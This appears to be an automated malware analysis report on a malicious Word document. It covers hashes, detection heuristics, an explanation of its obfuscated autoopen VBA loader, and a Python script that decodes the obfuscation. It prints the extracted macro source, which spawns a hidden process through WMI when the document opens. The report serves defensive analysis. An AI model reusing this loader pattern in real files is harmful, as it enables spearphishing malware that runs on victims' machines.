Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 78ccbb54d3dab7d0…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 134.0 KB
Created: 2019-09-24 06:41:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: ad380f257f4c457f2037c06309e3acbd
SHA-1: 67d2f6119b128e3aa7df01926e0973456e776b03
SHA-256: 78ccbb54d3dab7d0568b76caa8d3a94b26d4c159c36e93061585b2d43a7196c9
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Word OLE document carrying obfuscated VBA macros. The extracted source (carved here as macros.bas) spans three modules: Kkmjww, the document class module (VB_Base = "1Normal.ThisDocument") carrying 18 MSForms TextBox controls whose text holds the obfuscated strings; Shqkwv, which holds the decoder Ti1iz0cl and the launcher Nnazwms; and S8u1adw, which contains Sub autoopen. Word runs autoopen without user interaction when the document is opened, and it calls Nnazwms. Nnazwms builds a command line from two TextBox values (Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz) and passes it to CreateObject(...).Create(...), where the CreateObject argument decodes to the WMI moniker winmgmts:Win32_Process: Ti1iz0cl strips the separator "_:_a" (itself produced at run time by a nested Replace that removes the junk string uegw72bdja) from a padded literal, so neither "winmgmts" nor "Win32_Process" appears anywhere in the source. The third Create argument is an object built in Yh3wpj from another decoded TextBox value (Kkmjww.P5zziw) whose ShowWindow property is then set; this matches the Win32_ProcessStartup object that Win32_Process.Create accepts as its ProcessStartupInformation parameter and is normally used to run the child process with a hidden window. Because the command line is stored in the embedded controls' own storages rather than in the VBA module, it cannot be recovered from this preview alone: the control strings have to be pulled from those storages (olevba reports such form strings separately from the module source) or the spawned process observed dynamically. The rest of the code (counting loops wrapped around DoEvents, Declare statements against randomly named libraries that are never called, unused constants) is filler meant to pad the module and slow analysis. Taken together this is a macro loader that spawns a process through WMI, most likely to download and execute a second-stage payload; the payload itself is not inside this document.

Heuristics (8)

  • ClamAV: Doc.Malware.Generic-7178224-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]
    Document contains VBA macro code.
  • Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder is the junk-token variant: Ti1iz0cl strips a separator ("_:_a") from padded literals and from the embedded TextBox values.
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    A procedure named autoopen is present (module S8u1adw); Word runs it when the document is opened.
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject is called twice, both times on a decoded argument. The literal argument resolves to the WMI moniker winmgmts:Win32_Process, whose Create method is then invoked; the other argument is read from a TextBox control and is not recoverable from the source alone.
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here the source was recovered, so this finding corroborates the source-level findings rather than replacing them; a disagreement between the p-code and the recovered source would point to VBA stomping.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this canned description conflicts with the findings above: a VBA project was recovered from this sample, so here the marker is redundant with OLE_VBA_AUTOOPEN.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace that Office writes into embedded drawing parts; it is not an indicator of compromise and should not be added to block lists.
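
As an added illustration (not part of the analyzer's output or of oletools), the following Python reproduces the junk-token decoder from the extracted source and applies the static triage the loader heuristic describes: find auto-exec entry points, recover the run-time separator from the nested Replace, and resolve each CreateObject argument either to its decoded string or, where the macro reads a TextBox control, to a marker saying the value is not in the VBA source. SAMPLE_VBA is a constructed excerpt of the macro shown on this page with the junk loops removed; the regex-based parsing and the AUTOEXEC_NAMES list are the example's own simplifications and are not exhaustive.

```python
import re

# Constructed excerpt: the decoder, the auto-exec entry point and the COM sinks, copied
# from the extracted macro source (macros.bas) on this page; junk timing loops omitted.
SAMPLE_VBA = r'''
Attribute VB_Name = "Kkmjww"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Name = "Shqkwv"
Function Nnazwms()
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
End Function
Function Ti1iz0cl(E6pinh)
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function
Attribute VB_Name = "S8u1adw"
Sub autoopen()
Nnazwms
End Sub
Function Yh3wpj()
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
End Function
'''

# Procedure names Word/Excel run without user interaction (assumed list, not exhaustive).
AUTOEXEC_NAMES = {"autoopen", "autoexec", "autonew", "autoclose", "autoexit",
                  "document_open", "document_close", "workbook_open", "auto_open"}
LIT = r'"((?:[^"]|"")*)"'          # one VBA string literal ("" escapes a quote)

def unquote(lit):
    return lit.replace('""', '"')

def junk_token(source):
    """Recover the separator that Replace("<padded literal>", "<junk>", "") builds at run time."""
    m = re.search(r'Replace\(\s*' + LIT + r'\s*,\s*' + LIT + r'\s*,\s*""\s*\)', source)
    return unquote(m.group(1)).replace(unquote(m.group(2)), "") if m else None

def decode(encoded, token):
    """Outer Replace(x, token, ""): drop every occurrence of the separator."""
    return encoded.replace(token, "")

def autoexec_entrypoints(source):
    names = re.findall(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)',
                       source, re.M | re.I)
    return sorted(n for n in names if n.lower() in AUTOEXEC_NAMES)

def textbox_controls(source):
    """Controls declared via VB_Control; their text lives in the control storage, not in VBA source."""
    return set(re.findall(r'Attribute VB_Control = "(\w+),', source))

def createobject_args(source):
    """Resolve each CreateObject(<decoder>(<arg>)) sink to a decoded string where possible."""
    token, controls = junk_token(source), textbox_controls(source)
    results = []
    for inner in re.findall(r'CreateObject\(\s*\w+\(\s*(.+?)\s*\)\s*\)', source):
        lit = re.fullmatch(LIT, inner)
        ref = re.fullmatch(r'(\w+)\.(\w+)', inner)
        if lit and token is not None:
            results.append(("literal", decode(unquote(lit.group(1)), token)))
        elif ref and ref.group(2) in controls:
            results.append(("control-value", inner))   # not recoverable from the source alone
        else:
            results.append(("unresolved", inner))
    return results

def triage(source):
    return {"autoexec": autoexec_entrypoints(source),
            "token": junk_token(source),
            "sinks": createobject_args(source)}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run stand-alone it reports the autoopen entry point, the recovered token "_:_a", the first sink decoded to winmgmts:Win32_Process, and the second sink (Kkmjww.P5zziw) flagged as a control value. That flag is the cue to dump the embedded control storages (olevba lists such form strings separately from the module source) before drawing any conclusion about the command line, since the source on its own only proves that a process is spawned through WMI, not what it runs.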

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9912 bytes
SHA-256: 3a590130416c2ddec491bdb9d5593d4a6bc4a2e4e94499057153ad4a7e7681c8

Preview: first 1,000 lines of the extracted script (the modules Kkmjww, Shqkwv and S8u1adw are concatenated)
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/5ac8f439e81c4ba78cebc08a75f5b427.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)